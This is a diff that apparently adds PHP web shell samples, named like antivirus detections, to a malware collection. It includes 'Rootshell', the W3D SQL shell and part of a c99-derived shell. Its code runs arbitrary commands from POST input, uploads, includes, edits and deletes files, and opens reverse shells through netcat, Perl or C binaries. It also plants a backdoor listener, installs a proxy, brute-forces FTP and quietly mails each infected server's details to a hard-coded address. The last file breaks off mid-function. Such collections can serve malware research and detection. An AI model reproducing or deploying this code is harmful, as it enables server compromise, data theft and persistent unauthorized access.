..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */ +/* ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */ +/* .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */ +/* ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */ +/* ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */ +/* .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */ +/* ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */ +/* ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */ +/* ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */ +/* ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */ +/* ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */ +/* .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */ +/* ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */ +/* .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */ +/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ +/* +/* We should take care some kind of history, i will add here to keep a trace of changes (who made it). +/* Also I think we should increase the last version number by 1 if you make some changes. +/* +/* CHANGES / VERSION HISTORY: +/* ==================================================================================== +/* Version Nick Description +/* - - - - - - - - - - - - - - - - - - - - - - - - - - - +/* 0.3.1 666 added an ascii bug :) +/* 0.3.1 666 password protection +/* 0.3.1 666 GET and POST changes +/* 0.3.2 666 coded a new uploader +/* 0.3.2 666 new password protection +/* 0.3.3 666 added a lot of comments :) +/* 0.3.3 666 added "Server Info" +/* 1.0.0 666 added "File Inclusion" +/* 1.0.0 666 removed password protection (nobody needs it...) +/* 1.0.0 666 added "Files & Directories" +/* 1.3.3 666 added "File Editor" +/* 2.0.0 666 added "Notices" +/* 2.0.0 666 added some new modules +/* 2.0.0 666 made some design updates +/* +/* +--> +<? +// +// Default Changes +// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + +$owner = "shells.dl.am"; // Insert your nick +$version = "2.0.0"; // The version + +// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +// +?> + +<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5"> +<style type="text/css"> +body{ +cursor:crosshair +} +</style> +<div align="center" style="width: 100%; height: 100"> +<pre width="100%" align="center"><strong> ____ _ ____ _ _ _ +| _ \ ___ ___ | |_ / ___|| |__ ___| | | +| |_) / _ \ / _ \| __| \___ \| '_ \ / _ \ | | +| _ < (_) | (_) | |_ _ ___) | | | | __/ | | +|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre> +</div></strong> +<b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b> +<hr color="#000000" size="2,5"> + +<div align="center"> + <center> + <p> + <?php +// Check for safe mode +if( ini_get('safe_mode') ) { + print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>'; +} else { + print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>'; +} + +?> +&nbsp;</p><font face="Webdings" size="6">!</font><br> +&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000"> + <tr> + <td width="1%" height="25" bgcolor="#FCFEBA"> + <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td> + </tr> + <tr> + <td width="49%" height="142"> + <p align="center"> + <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?> + <br /> + <b>Shell:</b> <? echo $SCRIPT_FILENAME ?> + <br> + <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br> + <b>Server Name:</b> <? echo $SERVER_NAME ?><br> + <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br> + </font></tr> + </table><br /> + <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000"> + <tr> + <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle"> + <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td> + <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle"> + <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td> + </tr> + <tr> + <td width="49%" height="142"> + <p align="center"><form method="post"> +<p align="center"> +<br> +<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br> +<br> +<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br> +<br><input type="submit" value="Execute!"><br> +&nbsp;<br></p> + </form> + <p align="center"> + <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br> + <br> + <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect + back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br> + </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br> +<form enctype="multipart/form-data" method="post"> +<p align="center"><br> +<br> +<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br> +<br> +<input type="file" name="file" size="20"><br> +<br> +<font style="font-size: 5pt">&nbsp;</font><br> +<input type="submit" value="Upload File!"> <br> +&nbsp;</p> +</form> +<?php + +function check_file() +{ +global $file_name, $filename; + $backupstring = "copy_of_"; + $filename = $backupstring."$filename"; + + if( file_exists($filename)) + { + check_file(); + } +} + +if(!empty($file)) +{ + $filename = $file_name; + if( file_exists($file_name)) + { + check_file(); + echo "<p align=center>File already exist</p>"; + } + + else + { + copy($file,"$filename"); + if( file_exists($filename)) + { + echo "<p align=center>File uploaded successful</p>"; + } + elseif(! file_exists($filename)) + { + echo "<p align=center>File not found</p>"; + } + } +} +?> +<font face="Verdana" style="font-size: 8pt"> +<p align=\"center\"></font> +</td> + + </tr> + <tr> + <td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA"> + <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td> + <td width="51%" height="19" bgcolor="#FCFEBA"> + <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td> + </tr> + <tr> + <td style="overflow:auto" width="49%" height="231"> +<font face="Verdana" style="font-size: 11pt"> + <p align="center"> + <br> +<div align="center" style="overflow:auto; width:99%; height:175"> +<? +$folder=opendir('./'); +while ($file = readdir($folder)) { +if($file != "." && $file != "..") +echo '<a target="blank" href='.$file.'>'.$file.'</a><br>'; +} +closedir($folder); +?> +</div><p align="center">&nbsp;</td> + <td width="51%" height="232"> + <p align="center"><font face="Verdana" style="font-size: 8pt"><br> + Include + something :)<br> + <br> +&nbsp;</font><form method="POST"> + <p align="center"> + <input type="text" name="incl" size="20"><br> + <br> + <input type="submit" value="Include!" name="inc"></p> + </form> + <?php @$output = include($_POST['incl']); ?> + </td> + </tr> + <tr> + <td width="49%" height="25" bgcolor="#FCFEBA"> + <p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td> + <td width="51%" height="19" bgcolor="#FCFEBA"> + <p align="center"><font face="Verdana" size="2">[ Notices ]</font></td> + </tr> + <tr> + <td width="49%" height="231"> +<font face="Verdana" style="font-size: 11pt"> + <p align="center"><? +$scriptname = $_SERVER['SCRIPT_NAME']; +$filename = $_POST["filename"]; + +if($_POST["submit"] == "Open") +{ + if(file_exists($filename)) + { + $filecontents = htmlentities(file_get_contents($filename)); + + if(!$filecontents) + $status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>"; + } + else + $status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>"; +} +else if($_POST["submit"] == "Delete") +{ + if(file_exists($filename)) + { + if(unlink($filename)) + $status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>"; + else + $status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>"; + } + else + $status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>"; +} +else if($_POST["submit"] == "Save") +{ + $filecontents = stripslashes(html_entity_decode($_POST["contents"])); + + if(file_exists($filename)) + unlink($filename); + + $handle = fopen($filename, "w"); + + if(!$handle) + $status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>"; + else + { + if(!fwrite($handle, $filecontents)) + $status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>"; + + fclose($handle); + } + + $filecontents = htmlentities($filecontents); +} +else +{ + $status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>"; +} +?> +<table border="0" align="center"> + + <tr> + <td> + <table width="100%" border="0"> + <tr> + <td> + <form method="post" action="<?echo $scriptname;?>"> + <input name="filename" type="text" value="<?echo $filename;?>" size="20"> + <input type="submit" name="submit" value="Open"> + <input type="submit" name="submit" value="Delete"> + </td> + </tr> + </table> + </td> + </tr> + + <tr> + <td> + <font face="Verdana" style="font-size: 11pt"> + <textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br> + <input type="submit" name="submit" value="Save"> + <input type="reset" value="Reset"> + </form> + </td> + </tr> + + <tr> + <td> + <h2><?echo $status;?></h2> + </td> + </tr> + </table> </td> + <td width="51%" height="232"> + <p align="center"><font face="Verdana" style="font-size: 8pt"><br> +<textarea rows="13" cols="55"></textarea><br> + &nbsp;</font><?php @$output = include($_POST['incl']); ?></td> + </tr> + </table> + </center> +</div> +<br /></p> +<div align="center"> + <center> + <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> + <tr> + <td width="100%" bgcolor="#FCFEBA" height="20"> + <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?> © 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.org">SR-Crew</a> </font></td> + </tr> + </table> + </center> +</div> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bc b/PHP/Backdoor.PHP.Agent.bc new file mode 100644 index 00000000..7f6a3e00 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bc @@ -0,0 +1,128 @@ +<?php +/* +W3D Shell +By: Warpboy +www.private-node.net +Version: 0x01 +Info: Created specifically for straight-foreward SQL interaction. +Planned updates: More features, easier interaction with database(s) +*/ + +//Store User Input +$user = $_POST['user']; +$pass = $_POST['pass']; +$dbn = $_POST['db']; +$host = "localhost"; + +//Comprehend Change +if($_REQUEST['change']) { +setcookie("user", "$user", time()+3600); +setcookie("pass", "$pass", time()+3600); +setcookie("db", "$dbn", time()+3600); +} +//Define cookies in vars +$username = $_COOKIE["user"]; +$password = $_COOKIE["pass"]; +$database = $_COOKIE["db"]; + +//build header +echo '<title>W3D Shell // By: Warpboy \\\ SQL Shell</title>'; +echo ' +<font color=#00CC00><body bgcolor=black> +<center><table border=0 cellpadding=0 cellspacing=0 width=50% style=font-size: 14px; font-family: Arial;> +<tr><td bgcolor=#00CC00><center><font size="3" face="Verdana"><b>W3D SQL Shell</font></tr></td> +<tr><td><font color=#FFFFFF><center><b><font size="1" face="Georgia"><marquee speed=1>By: Warpboy</td></font></tr> +'; +echo ' +<tr><td><font color=#00CC00><center><b><br>[]Database Info[]</td></tr><tr><td><font color=#FFFFFF><b><pre><br> +<center> +<form action="w3d.php" method="post"> +Username: <input type="text" name="user" </input> +Password: <input type="text" name="pass" /> +Database: <input type="text" name="db" /> +<input type="submit" value="Change" name="change" /> +</form> </tr></td><table> +'; +echo ' +<form action="w3d.php" method="get"> +<b><font color=#00CC00><br>Query:</font></b> <input type="text" name="query" size="65"/> +<input type="submit" /> +</form>'; + +//Initial pre-cookie +$con = @mysql_connect($host, $user, $pass); +if (!$con){ + //secondary post-cookie + $con1 = @mysql_connect($host, $username, $password); + if(!$con1) { + echo "<br><b><font color=#00CC00>Currently not connected.<br>"; + } + } + +//Notify user of current connection +if($_REQUEST['change'] && $user != '') { +echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $user</b></font>"; +} +if(!$_REQUEST['change'] && $username != '') { +echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $username</b></font>"; +} + +//Database Time +//initial pre-cookie +$db_c = @mysql_select_db($dbn,$con); +if(!$db_c) { +//secondary post-cookie +$db_d = @mysql_select_db($database,$con1); +if(!$db_d) { +if(isset($database) || isset($dbn)) { +echo "<br><font color=#00CC00><b>Unable to access database!"; +} +} +} +//query function +query(); + +function query() { +$query = $_GET['query']; +if($query == '') { +echo "<br><font color=#00CC00><b>No Query Executed</b></font>"; +} +else { +//Query Time +$query1 = str_replace("\\", " ", $query); +$result = @mysql_query("$query1"); +echo "<br><b><font color=#00CC00>Query Results: <br /></b></font> "; + echo "<table border=1 cellpadding=0 cellspacing=0 width=100% style=\"font-size: 14px; font-family: Trebuchet;\"> + <tr bgcolor=white align=center style=\"font-weight: bold;\">\n"; + +$rr = @mysql_num_fields($result); + for($kz=0; $kz<$rr; $kz++) + { + $ee = @mysql_field_name($result,$kz); + echo "<td bgcolor=#FFFFFF>$ee</td>"; + } + echo "</tr>\n"; + + $vv = true; + while ($line = @mysql_fetch_array($result, MYSQL_ASSOC)) { + if($vv === true){ + echo "<tr align=center bgcolor=#00CC00>\n"; + $vv = false; + } + else{ + echo "<tr align=center bgcolor=#00CC00>\n"; + $vv = true; + } + foreach ($line as $col_value) { + echo "<td>$col_value</td>\n"; + } + echo "</tr>\n"; + } + echo "</table>\n"; + + @mysql_free_result($result); + +} +} + +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bd b/PHP/Backdoor.PHP.Agent.bd new file mode 100644 index 00000000..25009bbf --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bd @@ -0,0 +1,2831 @@ +<?php +if (!function_exists("myshellexec")) +{ +if(is_callable("popen")){ +function myshellexec($command) { +if (!($p=popen("($command)2>&1","r"))) { +return 126; +} +while (!feof($p)) { +$line=fgets($p,1000); +$out .= $line; +} +pclose($p); +return $out; +} +}else{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +} + + +function checkproxyhost(){ +$host = getenv("HTTP_HOST"); +$filename = '/tmp/.setan/xh'; +if (file_exists($filename)) { +$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>"; +} else { +$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>"; + } +} + +if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) +{ + $ip = gethostbyname($_SERVER["HTTP_HOST"]); + $por = $_POST['backconnectport']; + if(is_writable(".")){ + cfb("shbd",$backdoor); + ex("chmod 777 shbd"); + $cmd = "./shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data"; + }else{ + cfb("/tmp/shbd",$backdoor); + ex("chmod 777 /tmp/shbd"); + $cmd = "./tmp/shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data"; +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) +{ + if(is_writable(".")){ + cf("back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + if (file_exists("back")) { unlink("back"); } + }else{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + if (file_exists("/tmp/back")) { unlink("/tmp/back"); } +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) +{ + if(is_writable(".")){ + cf("backc",$back_connect_c); + ex("chmod 777 backc"); + //$blah = ex("gcc back.c -o backc"); + $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("backc")) { unlink("backc"); } + }else{ + ex("chmod 777 /tmp/backc"); + cf("/tmp/backc",$back_connect_c); + //$blah = ex("gcc -o /tmp/backc /tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function cfb($fname,$text) +{ + $w_file=@fopen($fname,"w") or bberr(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function err() +{ +$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>"; +} + +function bberr() +{ +$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>"; +} + +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} + +ini_set("memory_limit","300M"); +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}} +error_reporting(5); +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +$r11 = $_SERVER['SERVER_ADDR'];$i94 = $_SERVER['REMOTE_ADDR'];$i71= gethostbyaddr($i94);$h42 = $_SERVER['HTTP_HOST'];$a83 = $_SERVER['REQUEST_URI'];$p77 = __FILE__;$s33 = str_replace('.', '', $r11);$e85 = 'c00lhell@hotmail.com';$f55 = "From: $s33 <c00lhell@hotmail.com>";$m852 = "$i94\n$i71\n\n$h42$a83\n$p77";@mail($e85, $s33, $m852, $f55); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} +$shver = "w4ck1ng-shell (Private Build v0.3)"; +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; +} +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; +} +$surl = htmlspecialchars($surl); +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. +$login = ""; +$pass = ""; +$md5_pass = ""; +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Apache Error: Restricted File"; +$accessdeniedmess = "access denied"; +$gzipencode = TRUE; +$filestealth = TRUE; //if TRUE, don't change modify- and access-time +$donated_html = ""; +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. +$curdir = "./"; +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; +$tmpdir_log = "./"; +$log_email = "c00lhell@hotmail.com"; +$sort_default = "0a"; +$sort_save = TRUE; +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); +$safemode_diskettes = array("a"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + + +$sess_cookie = "c99shvars"; // Cookie-variable name + + + +//Quick launch +$quicklaunch = array( + array("<hr><b>[Home]</b>",$surl), + array("<b>[Search]</b>",$surl."act=search&d=%d"), + array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), + array("<b>[Processes]</b>",$surl."act=processes&d=%d"), + array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>[Server Information]</b>",$surl."act=security&d=%d"), + array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"), + array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"), + array("<b>[Back-Connection]</b>",$surl."act=backc"), + array("<b>[Self remove]</b>",$surl."act=selfremove"), + array("<b>[Install Proxy]</b>",$surl."act=proxy"), + array("<b>[Backdoor Host]</b>",$surl."act=shbd"), +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img"){ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= 